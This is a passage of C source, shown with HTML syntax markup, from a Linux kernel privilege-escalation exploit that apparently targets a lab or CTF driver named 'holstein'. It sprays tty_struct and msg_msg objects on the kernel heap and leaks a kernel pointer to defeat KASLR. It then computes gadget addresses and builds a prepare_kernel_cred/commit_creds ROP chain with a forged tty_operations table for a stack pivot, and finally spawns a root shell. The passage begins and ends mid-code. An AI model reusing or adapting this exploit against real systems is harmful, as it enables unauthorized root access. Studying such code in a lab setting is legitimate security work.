<span class="kt">uint64_t</span> <span class="n">pop_rdi</span><span class="p">;</span>
<span class="c1">// 0x487980: xchg rdi, rax; sar bh, 0x89; ret;</span>
<span class="kt">uint64_t</span> <span class="n">xchg_rdi_rax</span><span class="p">;</span>
<span class="c1">// 0x32afea: ret;</span>
<span class="kt">uint64_t</span> <span class="n">ret</span><span class="p">;</span>

<span class="kt">void</span> <span class="nf">err</span><span class="p">(</span><span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">format</span><span class="p">,</span> <span class="p">...)</span> <span class="p">{</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">format</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"%s"</span><span class="p">,</span> <span class="s">"[!] "</span><span class="p">);</span>
    <span class="kt">va_list</span> <span class="n">args</span><span class="p">;</span>
    <span class="n">va_start</span><span class="p">(</span><span class="n">args</span><span class="p">,</span> <span class="n">format</span><span class="p">);</span>
    <span class="n">vfprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="n">format</span><span class="p">,</span> <span class="n">args</span><span class="p">);</span>
    <span class="n">va_end</span><span class="p">(</span><span class="n">args</span><span class="p">);</span>
    <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"%s"</span><span class="p">,</span> <span class="s">"</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
<span class="p">}</span>

<span class="kt">void</span> <span class="nf">info</span><span class="p">(</span><span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">format</span><span class="p">,</span> <span class="p">...)</span> <span class="p">{</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">format</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">return</span><span class="p">;</span>
    <span class="p">}</span>
    
    <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"%s"</span><span class="p">,</span> <span class="s">"[*] "</span><span class="p">);</span>
    <span class="kt">va_list</span> <span class="n">args</span><span class="p">;</span>
    <span class="n">va_start</span><span class="p">(</span><span class="n">args</span><span class="p">,</span> <span class="n">format</span><span class="p">);</span>
    <span class="n">vfprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="n">format</span><span class="p">,</span> <span class="n">args</span><span class="p">);</span>
    <span class="n">va_end</span><span class="p">(</span><span class="n">args</span><span class="p">);</span>
    <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"%s"</span><span class="p">,</span> <span class="s">"</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">}</span>

<span class="kt">void</span> <span class="nf">save_state</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">__asm__</span><span class="p">(</span>
        <span class="s">".intel_syntax noprefix;"</span>   
        <span class="s">"mov user_cs, cs;"</span>
        <span class="s">"mov user_ss, ss;"</span>
        <span class="s">"mov user_sp, rsp;"</span>
        <span class="c1">// Push CPU flags onto stack</span>
        <span class="s">"pushf;"</span>
        <span class="c1">// Pop CPU flags into var</span>
        <span class="s">"pop user_rflags;"</span>
        <span class="s">".att_syntax;"</span>
    <span class="p">);</span>
<span class="p">}</span>

<span class="c1">// Should spawn a root shell</span>
<span class="kt">void</span> <span class="nf">pop_shell</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">uid_t</span> <span class="n">uid</span> <span class="o">=</span> <span class="n">getuid</span><span class="p">();</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">uid</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"We are not root, wtf?"</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="n">info</span><span class="p">(</span><span class="s">"We got root, spawning shell!"</span><span class="p">);</span>
    <span class="n">system</span><span class="p">(</span><span class="s">"/bin/sh"</span><span class="p">);</span>
    <span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
<span class="p">}</span>

<span class="c1">// Open a char device, just exit on error, this is exploit code</span>
<span class="kt">int</span> <span class="nf">open_device</span><span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="n">dev</span><span class="p">,</span> <span class="kt">int</span> <span class="n">flags</span><span class="p">)</span> <span class="p">{</span>
    <span class="kt">int</span> <span class="n">fd</span> <span class="o">=</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">dev</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"NULL ptr given to `open_device()`"</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="n">fd</span> <span class="o">=</span> <span class="n">open</span><span class="p">(</span><span class="n">dev</span><span class="p">,</span> <span class="n">flags</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">fd</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"Failed to open '%s'"</span><span class="p">,</span> <span class="n">dev</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="k">return</span> <span class="n">fd</span><span class="p">;</span>
<span class="p">}</span>

<span class="c1">// Spray kmalloc-1024 sized '/dev/ptmx' structures on the kernel heap</span>
<span class="kt">void</span> <span class="nf">alloc_ptmx</span><span class="p">()</span> <span class="p">{</span>
    <span class="kt">int</span> <span class="n">fd</span> <span class="o">=</span> <span class="n">open</span><span class="p">(</span><span class="s">"/dev/ptmx"</span><span class="p">,</span> <span class="n">O_RDONLY</span> <span class="o">|</span> <span class="n">O_NOCTTY</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">fd</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"Failed to open /dev/ptmx"</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="n">open_ptmx</span><span class="p">[</span><span class="n">num_ptmx</span><span class="p">]</span> <span class="o">=</span> <span class="n">fd</span><span class="p">;</span>
    <span class="n">num_ptmx</span><span class="o">++</span><span class="p">;</span>
<span class="p">}</span>

<span class="c1">// Check to see if we have a reference to a tty_struct by reading in the magic</span>
<span class="c1">// number for the current allocation in our slab</span>
<span class="n">bool</span> <span class="nf">found_ptmx</span><span class="p">(</span><span class="kt">int</span> <span class="n">fd</span><span class="p">)</span> <span class="p">{</span>
    <span class="kt">unsigned</span> <span class="kt">char</span> <span class="n">magic_buf</span><span class="p">[</span><span class="mi">4</span><span class="p">];</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">fd</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"Bad fd given to `found_ptmx()`"</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="kt">ssize_t</span> <span class="n">bytes_read</span> <span class="o">=</span> <span class="n">read</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="n">magic_buf</span><span class="p">,</span> <span class="mi">4</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">bytes_read</span> <span class="o">!=</span> <span class="p">(</span><span class="kt">ssize_t</span><span class="p">)</span><span class="mi">4</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"Failed to read enough bytes from fd: %d"</span><span class="p">,</span> <span class="n">fd</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="k">if</span> <span class="p">(</span><span class="o">*</span><span class="p">(</span><span class="kt">int32_t</span> <span class="o">*</span><span class="p">)</span><span class="n">magic_buf</span> <span class="o">!=</span> <span class="mh">0x5401</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">return</span> <span class="nb">false</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="k">return</span> <span class="nb">true</span><span class="p">;</span>
<span class="p">}</span>

<span class="c1">// Leak a tty_struct-&gt;ops field which is constant offset from kernel base</span>
<span class="kt">uint64_t</span> <span class="nf">leak_ops</span><span class="p">(</span><span class="kt">int</span> <span class="n">fd</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">fd</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"Bad fd given to `leak_ops()`"</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="cm">/* tty_struct {
        int magic;      // 4 bytes
        struct kref;    // 4 bytes (single member is an int refcount_t)
        struct device *dev; // 8 bytes
        struct tty_driver *driver; // 8 bytes
        const struct tty_operations *ops; (offset 24 (or 0x18))
        ...
    } */</span>

    <span class="c1">// Read first 32 bytes of the structure</span>
    <span class="kt">unsigned</span> <span class="kt">char</span> <span class="o">*</span><span class="n">ops_buf</span> <span class="o">=</span> <span class="n">calloc</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">32</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">ops_buf</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"Failed to allocate ops_buf"</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="kt">ssize_t</span> <span class="n">bytes_read</span> <span class="o">=</span> <span class="n">read</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="n">ops_buf</span><span class="p">,</span> <span class="mi">32</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">bytes_read</span> <span class="o">!=</span> <span class="p">(</span><span class="kt">ssize_t</span><span class="p">)</span><span class="mi">32</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"Failed to read enough bytes from fd: %d"</span><span class="p">,</span> <span class="n">fd</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="kt">uint64_t</span> <span class="n">ops</span> <span class="o">=</span> <span class="o">*</span><span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">ops_buf</span><span class="p">[</span><span class="mi">24</span><span class="p">];</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"tty_struct-&gt;ops: 0x%lx"</span><span class="p">,</span> <span class="n">ops</span><span class="p">);</span>

    <span class="c1">// Solve for kernel base, keep the last 12 bits</span>
    <span class="kt">uint64_t</span> <span class="n">test</span> <span class="o">=</span> <span class="n">ops</span> <span class="o">&amp;</span> <span class="mh">0xfffULL</span><span class="p">;</span>

    <span class="c1">// These magic compares are for static offsets on this kernel</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">test</span> <span class="o">==</span> <span class="mh">0xb40ULL</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">return</span> <span class="n">ops</span> <span class="o">-</span> <span class="mh">0xc39b40ULL</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">test</span> <span class="o">==</span> <span class="mh">0xc60ULL</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">return</span> <span class="n">ops</span> <span class="o">-</span> <span class="mh">0xc39c60ULL</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="k">else</span> <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"Got an unexpected tty_struct-&gt;ops ptr"</span><span class="p">);</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="kt">void</span> <span class="nf">solve_gadgets</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// 0x723c0: commit_creds</span>
    <span class="n">commit_creds</span> <span class="o">=</span> <span class="n">base</span> <span class="o">+</span> <span class="mh">0x723c0ULL</span><span class="p">;</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"    &gt;&gt; commit_creds located @ 0x%lx</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">commit_creds</span><span class="p">);</span>

    <span class="c1">// 0x72560: prepare_kernel_cred</span>
    <span class="n">prepare_kernel_cred</span> <span class="o">=</span> <span class="n">base</span> <span class="o">+</span> <span class="mh">0x72560ULL</span><span class="p">;</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"    &gt;&gt; prepare_kernel_cred located @ 0x%lx</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">prepare_kernel_cred</span><span class="p">);</span>

    <span class="c1">// 0x800e10: swapgs_restore_regs_and_return_to_usermode</span>
    <span class="n">kpti_tramp</span> <span class="o">=</span> <span class="n">base</span> <span class="o">+</span> <span class="mh">0x800e10ULL</span> <span class="o">+</span> <span class="mi">22</span><span class="p">;</span> <span class="c1">// 22 offset, avoid pops</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"    &gt;&gt; kpti_tramp located @ 0x%lx</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">kpti_tramp</span><span class="p">);</span>

    <span class="c1">// 0x14fbea: push rdx; xor eax, 0x415b004f; pop rsp; pop rbp; ret;</span>
    <span class="n">push_rdx</span> <span class="o">=</span> <span class="n">base</span> <span class="o">+</span> <span class="mh">0x14fbeaULL</span><span class="p">;</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"    &gt;&gt; push_rdx located @ 0x%lx</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">push_rdx</span><span class="p">);</span>

    <span class="c1">// 0x35738d: pop rdi; ret;</span>
    <span class="n">pop_rdi</span> <span class="o">=</span> <span class="n">base</span> <span class="o">+</span> <span class="mh">0x35738dULL</span><span class="p">;</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"    &gt;&gt; pop_rdi located @ 0x%lx</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">pop_rdi</span><span class="p">);</span>

    <span class="c1">// 0x487980: xchg rdi, rax; sar bh, 0x89; ret;</span>
    <span class="n">xchg_rdi_rax</span> <span class="o">=</span> <span class="n">base</span> <span class="o">+</span> <span class="mh">0x487980ULL</span><span class="p">;</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"    &gt;&gt; xchg_rdi_rax located @ 0x%lx</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">xchg_rdi_rax</span><span class="p">);</span>

    <span class="c1">// 0x32afea: ret;</span>
    <span class="n">ret</span> <span class="o">=</span> <span class="n">base</span> <span class="o">+</span> <span class="mh">0x32afeaULL</span><span class="p">;</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"    &gt;&gt; ret located @ 0x%lx</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">ret</span><span class="p">);</span>
<span class="p">}</span>

<span class="c1">// Initialize a kernel message queue</span>
<span class="kt">int</span> <span class="nf">init_msg_q</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="kt">int</span> <span class="n">msg_qid</span> <span class="o">=</span> <span class="n">msgget</span><span class="p">(</span><span class="n">IPC_PRIVATE</span><span class="p">,</span> <span class="mo">0666</span> <span class="o">|</span> <span class="n">IPC_CREAT</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">msg_qid</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"`msgget()` failed to initialize queue"</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="n">msg_queue</span><span class="p">[</span><span class="n">num_queue</span><span class="p">]</span> <span class="o">=</span> <span class="n">msg_qid</span><span class="p">;</span>
    <span class="n">num_queue</span><span class="o">++</span><span class="p">;</span>

    <span class="k">return</span> <span class="n">msg_qid</span><span class="p">;</span>
<span class="p">}</span>

<span class="c1">// Allocate one msg_msg on the heap</span>
<span class="kt">size_t</span> <span class="nf">send_message</span><span class="p">()</span> <span class="p">{</span>
    <span class="c1">// Calculate current queue</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">num_queue</span> <span class="o">&lt;</span> <span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"`send_message()` called with no message queues"</span><span class="p">);</span>
    <span class="p">}</span>
    <span class="kt">int</span> <span class="n">curr_q</span> <span class="o">=</span> <span class="n">msg_queue</span><span class="p">[</span><span class="n">num_queue</span> <span class="o">-</span> <span class="mi">1</span><span class="p">];</span>

    <span class="c1">// Send message</span>
    <span class="kt">size_t</span> <span class="n">fails</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
    <span class="k">struct</span> <span class="n">msgbuf</span> <span class="p">{</span>
        <span class="kt">long</span> <span class="n">mtype</span><span class="p">;</span>
        <span class="kt">char</span> <span class="n">mtext</span><span class="p">[</span><span class="n">MSG_SZ</span><span class="p">];</span>
    <span class="p">}</span> <span class="n">msg</span><span class="p">;</span>

    <span class="c1">// Unique identifier we can use</span>
    <span class="n">msg</span><span class="p">.</span><span class="n">mtype</span> <span class="o">=</span> <span class="mh">0x1337</span><span class="p">;</span>

    <span class="c1">// Construct the ROP chain</span>
    <span class="n">memset</span><span class="p">(</span><span class="n">msg</span><span class="p">.</span><span class="n">mtext</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">MSG_SZ</span><span class="p">);</span>

    <span class="c1">// Pattern for offsets (debugging)</span>
    <span class="kt">uint64_t</span> <span class="n">base</span> <span class="o">=</span> <span class="mh">0x41</span><span class="p">;</span>
    <span class="kt">uint64_t</span> <span class="o">*</span><span class="n">curr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">msg</span><span class="p">.</span><span class="n">mtext</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
    <span class="k">for</span> <span class="p">(</span><span class="kt">size_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="mi">25</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
        <span class="kt">uint64_t</span> <span class="n">fill</span> <span class="o">=</span> <span class="n">base</span> <span class="o">&lt;&lt;</span> <span class="mi">56</span><span class="p">;</span>
        <span class="n">fill</span> <span class="o">|=</span> <span class="n">base</span> <span class="o">&lt;&lt;</span> <span class="mi">48</span><span class="p">;</span>
        <span class="n">fill</span> <span class="o">|=</span> <span class="n">base</span> <span class="o">&lt;&lt;</span> <span class="mi">40</span><span class="p">;</span>
        <span class="n">fill</span> <span class="o">|=</span> <span class="n">base</span> <span class="o">&lt;&lt;</span> <span class="mi">32</span><span class="p">;</span>
        <span class="n">fill</span> <span class="o">|=</span> <span class="n">base</span> <span class="o">&lt;&lt;</span> <span class="mi">24</span><span class="p">;</span>
        <span class="n">fill</span> <span class="o">|=</span> <span class="n">base</span> <span class="o">&lt;&lt;</span> <span class="mi">16</span><span class="p">;</span>
        <span class="n">fill</span> <span class="o">|=</span> <span class="n">base</span> <span class="o">&lt;&lt;</span> <span class="mi">8</span><span class="p">;</span>
        <span class="n">fill</span> <span class="o">|=</span> <span class="n">base</span><span class="p">;</span>
        
        <span class="o">*</span><span class="n">curr</span><span class="o">++</span> <span class="o">=</span> <span class="n">fill</span><span class="p">;</span>
        <span class="n">base</span><span class="o">++</span><span class="p">;</span> 
    <span class="p">}</span>

    <span class="c1">// ROP chain</span>
    <span class="kt">uint64_t</span> <span class="o">*</span><span class="n">rop</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">msg</span><span class="p">.</span><span class="n">mtext</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
    <span class="o">*</span><span class="n">rop</span><span class="o">++</span> <span class="o">=</span> <span class="n">pop_rdi</span><span class="p">;</span> 
    <span class="o">*</span><span class="n">rop</span><span class="o">++</span> <span class="o">=</span> <span class="mh">0x0</span><span class="p">;</span>
    <span class="o">*</span><span class="n">rop</span><span class="o">++</span> <span class="o">=</span> <span class="n">prepare_kernel_cred</span><span class="p">;</span> <span class="c1">// RAX now holds ptr to new creds</span>
    <span class="o">*</span><span class="n">rop</span><span class="o">++</span> <span class="o">=</span> <span class="n">xchg_rdi_rax</span><span class="p">;</span> <span class="c1">// Place creds into RDI </span>
    <span class="o">*</span><span class="n">rop</span><span class="o">++</span> <span class="o">=</span> <span class="n">commit_creds</span><span class="p">;</span> <span class="c1">// Now we have super powers</span>
    <span class="o">*</span><span class="n">rop</span><span class="o">++</span> <span class="o">=</span> <span class="n">kpti_tramp</span><span class="p">;</span>
    <span class="o">*</span><span class="n">rop</span><span class="o">++</span> <span class="o">=</span> <span class="mh">0x0</span><span class="p">;</span> <span class="c1">// pop rax inside kpti_tramp</span>
    <span class="o">*</span><span class="n">rop</span><span class="o">++</span> <span class="o">=</span> <span class="mh">0x0</span><span class="p">;</span> <span class="c1">// pop rdi inside kpti_tramp</span>
    <span class="o">*</span><span class="n">rop</span><span class="o">++</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">pop_shell</span><span class="p">;</span> <span class="c1">// Return here</span>
    <span class="o">*</span><span class="n">rop</span><span class="o">++</span> <span class="o">=</span> <span class="n">user_cs</span><span class="p">;</span>
    <span class="o">*</span><span class="n">rop</span><span class="o">++</span> <span class="o">=</span> <span class="n">user_rflags</span><span class="p">;</span>
    <span class="o">*</span><span class="n">rop</span><span class="o">++</span> <span class="o">=</span> <span class="n">user_sp</span><span class="p">;</span>
    <span class="o">*</span><span class="n">rop</span>   <span class="o">=</span> <span class="n">user_ss</span><span class="p">;</span>

    <span class="cm">/* struct tty_operations {
        struct tty_struct * (*lookup)(struct tty_driver *driver,
                struct file *filp, int idx);
        int  (*install)(struct tty_driver *driver, struct tty_struct *tty);
        void (*remove)(struct tty_driver *driver, struct tty_struct *tty);
        int  (*open)(struct tty_struct * tty, struct file * filp);
        void (*close)(struct tty_struct * tty, struct file * filp);
        void (*shutdown)(struct tty_struct *tty);
        void (*cleanup)(struct tty_struct *tty);
        int  (*write)(struct tty_struct * tty,
                const unsigned char *buf, int count);
        int  (*put_char)(struct tty_struct *tty, unsigned char ch);
        void (*flush_chars)(struct tty_struct *tty);
        unsigned int (*write_room)(struct tty_struct *tty);
        unsigned int (*chars_in_buffer)(struct tty_struct *tty);
        int  (*ioctl)(struct tty_struct *tty,
                unsigned int cmd, unsigned long arg);
        ...
    } */</span>

    <span class="c1">// Populate the 12 function pointers in the table that we have created.</span>
    <span class="c1">// There are 3 handlers that are invoked for allocated tty_structs when </span>
    <span class="c1">// their controlling process exits, they are close(), shutdown(),</span>
    <span class="c1">// and cleanup(). We have to overwrite these pointers for when we exit our</span>
    <span class="c1">// exploit process or else the kernel will panic with a RIP of </span>
    <span class="c1">// 0xdeadbeefdeadbeef. We overwrite them with a simple ret gadget</span>
    <span class="kt">uint64_t</span> <span class="o">*</span><span class="n">func_table</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">msg</span><span class="p">.</span><span class="n">mtext</span><span class="p">[</span><span class="n">rop_len</span><span class="p">];</span>
    <span class="k">for</span> <span class="p">(</span><span class="kt">size_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="mi">12</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
        <span class="c1">// If i == 4, we're on the close() handler, set to ret gadget</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">i</span> <span class="o">==</span> <span class="mi">4</span><span class="p">)</span> <span class="p">{</span> <span class="o">*</span><span class="n">func_table</span><span class="o">++</span> <span class="o">=</span> <span class="n">ret</span><span class="p">;</span> <span class="k">continue</span><span class="p">;</span> <span class="p">}</span>

        <span class="c1">// If i == 5, we're on the shutdown() handler, set to ret gadget</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">i</span> <span class="o">==</span> <span class="mi">5</span><span class="p">)</span> <span class="p">{</span> <span class="o">*</span><span class="n">func_table</span><span class="o">++</span> <span class="o">=</span> <span class="n">ret</span><span class="p">;</span> <span class="k">continue</span><span class="p">;</span> <span class="p">}</span>

        <span class="c1">// If i == 6, we're on the cleanup() handler, set to ret gadget</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">i</span> <span class="o">==</span> <span class="mi">6</span><span class="p">)</span> <span class="p">{</span> <span class="o">*</span><span class="n">func_table</span><span class="o">++</span> <span class="o">=</span> <span class="n">ret</span><span class="p">;</span> <span class="k">continue</span><span class="p">;</span> <span class="p">}</span>

        <span class="c1">// Magic value for debugging</span>
        <span class="o">*</span><span class="n">func_table</span><span class="o">++</span> <span class="o">=</span> <span class="mh">0xdeadbeefdeadbe00</span> <span class="o">+</span> <span class="n">i</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="c1">// Put our gadget address as the ioctl() handler to pivot stack</span>
    <span class="o">*</span><span class="n">func_table</span> <span class="o">=</span> <span class="n">push_rdx</span><span class="p">;</span>

    <span class="c1">// Spray msg_msg's on the heap</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">msgsnd</span><span class="p">(</span><span class="n">curr_q</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">msg</span><span class="p">,</span> <span class="n">MSG_SZ</span><span class="p">,</span> <span class="n">IPC_NOWAIT</span><span class="p">)</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">fails</span><span class="o">++</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="k">return</span> <span class="n">fails</span><span class="p">;</span>
<span class="p">}</span>

<span class="c1">// Check to see if we have a reference to one of our msg_msg structs</span>
<span class="n">bool</span> <span class="nf">found_msg</span><span class="p">(</span><span class="kt">int</span> <span class="n">fd</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Read out the msg_msg</span>
    <span class="kt">unsigned</span> <span class="kt">char</span> <span class="n">msg_buf</span><span class="p">[</span><span class="n">GBUF_SZ</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>
    <span class="kt">ssize_t</span> <span class="n">bytes_read</span> <span class="o">=</span> <span class="n">read</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="n">msg_buf</span><span class="p">,</span> <span class="n">GBUF_SZ</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">bytes_read</span> <span class="o">!=</span> <span class="p">(</span><span class="kt">ssize_t</span><span class="p">)</span><span class="n">GBUF_SZ</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"Failed to read from holstein"</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="cm">/* msg_msg {
        struct list_head m_list {
            struct list_head *next, *prev;
        } // 16 bytes
        long m_type; // 8 bytes
        size_t m_ts; // 8 bytes
        struct msg_msgseg* next; // 8 bytes
        void *security; // 8 bytes

        ===== Body Starts Here (offset 48) =====
    }*/</span> 

    <span class="c1">// Some heuristics to see if we indeed have a good msg_msg</span>
    <span class="kt">uint64_t</span> <span class="n">next</span> <span class="o">=</span> <span class="o">*</span><span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">msg_buf</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
    <span class="kt">uint64_t</span> <span class="n">prev</span> <span class="o">=</span> <span class="o">*</span><span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">msg_buf</span><span class="p">[</span><span class="k">sizeof</span><span class="p">(</span><span class="kt">uint64_t</span><span class="p">)];</span>
    <span class="kt">int64_t</span> <span class="n">m_type</span> <span class="o">=</span> <span class="o">*</span><span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">msg_buf</span><span class="p">[</span><span class="k">sizeof</span><span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span> <span class="o">*</span> <span class="mi">2</span><span class="p">];</span>

    <span class="c1">// Not one of our msg_msg structs</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">m_type</span> <span class="o">!=</span> <span class="mh">0x1337L</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">return</span> <span class="nb">false</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="c1">// We have to have valid pointers</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">next</span> <span class="o">==</span> <span class="mi">0</span> <span class="o">||</span> <span class="n">prev</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">return</span> <span class="nb">false</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="c1">// I think the pointers should be different as well</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">next</span> <span class="o">==</span> <span class="n">prev</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">return</span> <span class="nb">false</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="n">info</span><span class="p">(</span><span class="s">"Found msg_msg struct:"</span><span class="p">);</span>
